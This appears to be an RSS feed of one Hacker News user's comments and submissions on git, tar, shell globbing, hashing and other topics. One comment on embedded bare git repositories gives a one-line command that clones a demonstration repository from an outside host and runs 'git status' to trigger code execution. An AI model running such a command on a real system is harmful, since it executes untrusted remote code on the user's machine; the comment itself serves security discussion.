<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Hacker News: tomlx</title><link>https://news.ycombinator.com/user?id=tomlx</link><description>Hacker News RSS</description><docs>https://hnrss.org/</docs><generator>hnrss v2.1.1</generator><lastBuildDate>Thu, 23 Apr 2026 16:54:58 +0000</lastBuildDate><atom:link href="https://hnrss.org/user?id=tomlx" rel="self" type="application/rss+xml"></atom:link><item><title><![CDATA[New comment by tomlx in "I don't know how I feel about email"]]></title><description><![CDATA[
<p>was about to say that ...<p>> Tags: satire email</p>
]]></description><pubDate>Sun, 16 Jul 2023 14:10:04 +0000</pubDate><link>https://news.ycombinator.com/item?id=36747194</link><dc:creator>tomlx</dc:creator><comments>https://news.ycombinator.com/item?id=36747194</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=36747194</guid></item><item><title><![CDATA[New comment by tomlx in "Git-landmine – Create local malicious Git repo"]]></title><description><![CDATA[
<p>none that i know of</p>
]]></description><pubDate>Sun, 02 Jul 2023 14:45:12 +0000</pubDate><link>https://news.ycombinator.com/item?id=36561925</link><dc:creator>tomlx</dc:creator><comments>https://news.ycombinator.com/item?id=36561925</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=36561925</guid></item><item><title><![CDATA[The risks of embedded bare repositories in Git (2022)]]></title><description><![CDATA[
<p>Article URL: <a href="https://lwn.net/Articles/892755/">https://lwn.net/Articles/892755/</a></p>
<p>Comments URL: <a href="https://news.ycombinator.com/item?id=36561264">https://news.ycombinator.com/item?id=36561264</a></p>
<p>Points: 9</p>
<p># Comments: 0</p>
]]></description><pubDate>Sun, 02 Jul 2023 13:23:10 +0000</pubDate><link>https://lwn.net/Articles/892755/</link><dc:creator>tomlx</dc:creator><comments>https://news.ycombinator.com/item?id=36561264</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=36561264</guid></item><item><title><![CDATA[New comment by tomlx in "Git-landmine – Create local malicious Git repo"]]></title><description><![CDATA[
<p>git does not clone hooks, but if a subdirectory of a repo has the structure of a bare repo it can hijack git subcommands for code execution. try:<p><pre><code>  git clone https://git.0x90.space/vmann/pwnd && cd pwnd/whoot && git status
</code></pre>
it is a bit crazy this is not disabled by default yet.</p>
]]></description><pubDate>Sun, 02 Jul 2023 12:44:35 +0000</pubDate><link>https://news.ycombinator.com/item?id=36560959</link><dc:creator>tomlx</dc:creator><comments>https://news.ycombinator.com/item?id=36560959</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=36560959</guid></item><item><title><![CDATA[New comment by tomlx in "Should you use Let's Encrypt for internal hostnames?"]]></title><description><![CDATA[
<p>I never got why people think using tar is hard. Specify your archive File with f. want to eXtract it? add a x. want to Create it? add a c. Want it to be Verbose while doing that? add a v. if it's gZiped add a z. Granted, j for bzip2, t for listing is less obvious, but with that it's about everything you need for everyday usage and that more than suffices to disarm that bomb.</p>
]]></description><pubDate>Thu, 06 Jan 2022 02:40:43 +0000</pubDate><link>https://news.ycombinator.com/item?id=29818507</link><dc:creator>tomlx</dc:creator><comments>https://news.ycombinator.com/item?id=29818507</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=29818507</guid></item><item><title><![CDATA[New comment by tomlx in "Unix Admin Horror Story Summary (1992)"]]></title><description><![CDATA[
<p>Interestingly<p><pre><code>  $ bash -c 'cd /var/empty; echo .*'
  . ..
</code></pre>
but<p><pre><code>  $ ksh -c 'cd /var/empty; echo .*'
  .*
</code></pre>
Seems some ksh dev got bitten and restricted this ...</p>
]]></description><pubDate>Wed, 22 Dec 2021 05:23:52 +0000</pubDate><link>https://news.ycombinator.com/item?id=29645868</link><dc:creator>tomlx</dc:creator><comments>https://news.ycombinator.com/item?id=29645868</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=29645868</guid></item><item><title><![CDATA[New comment by tomlx in "Pattern-defeating quicksort"]]></title><description><![CDATA[
<p>This is beautiful. I will try to implement this once i'm at home ...</p>
]]></description><pubDate>Fri, 30 Jun 2017 14:41:32 +0000</pubDate><link>https://news.ycombinator.com/item?id=14671037</link><dc:creator>tomlx</dc:creator><comments>https://news.ycombinator.com/item?id=14671037</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=14671037</guid></item><item><title><![CDATA[New comment by tomlx in "How Hash Algorithms Work (2007)"]]></title><description><![CDATA[
<p>Title is missleading. From the title I expected something about how to design a hash algorithm, but the article is just a walk through the specific operations SHA-1 performs w/o further explanation.<p>Can anyone recommand resources about the actual design of (cryptographic) hash algorithms?</p>
]]></description><pubDate>Fri, 13 Jan 2017 14:12:09 +0000</pubDate><link>https://news.ycombinator.com/item?id=13390860</link><dc:creator>tomlx</dc:creator><comments>https://news.ycombinator.com/item?id=13390860</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=13390860</guid></item><item><title><![CDATA[New comment by tomlx in "Let’s Stop Bashing C"]]></title><description><![CDATA[
<p>Compiles fine with -Wall -Werror. No warnings.</p>
]]></description><pubDate>Fri, 02 Dec 2016 18:04:35 +0000</pubDate><link>https://news.ycombinator.com/item?id=13090809</link><dc:creator>tomlx</dc:creator><comments>https://news.ycombinator.com/item?id=13090809</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=13090809</guid></item><item><title><![CDATA[New comment by tomlx in "Show HN: LockedAway – A unique text experience"]]></title><description><![CDATA[
<p>Nice read. I liked it ... :)</p>
]]></description><pubDate>Wed, 17 Aug 2016 10:14:37 +0000</pubDate><link>https://news.ycombinator.com/item?id=12303509</link><dc:creator>tomlx</dc:creator><comments>https://news.ycombinator.com/item?id=12303509</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=12303509</guid></item></channel></rss>